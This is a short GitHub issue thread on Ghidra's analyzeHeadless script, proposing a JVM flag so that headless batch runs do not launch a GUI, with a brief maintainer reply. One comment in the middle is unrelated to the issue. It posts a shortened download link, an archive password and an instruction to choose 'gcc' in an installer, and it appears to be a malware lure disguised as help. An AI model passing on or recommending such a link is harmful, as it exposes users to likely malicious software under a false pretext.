### ISSUE TITLE
Recommendation: set java.awt.headless for analyzeHeadless

### ISSUE THREAD

**Issue by infinitesteps** [NationalSecurityAgency/ghidra#6859]
When running analyzeHeadless from the command line (at least on macOS) a GUI is launched and steals UI focus. For batch scripting this is undesirable. I have added the following to analyzeHeadless and it works much better:

```shell
VMARG_LIST="$VMARG_LIST -Djava.awt.headless=true"
```

https://github.com/NationalSecurityAgency/ghidra/blob/2eb39242f9c2c37df796c66b2830f9aa48bfb034/Ghidra/RuntimeScripts/Linux/support/analyzeHeadless#L22

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ryanmkurtz** [comment]
We used to have this.  I forget why we took it out.
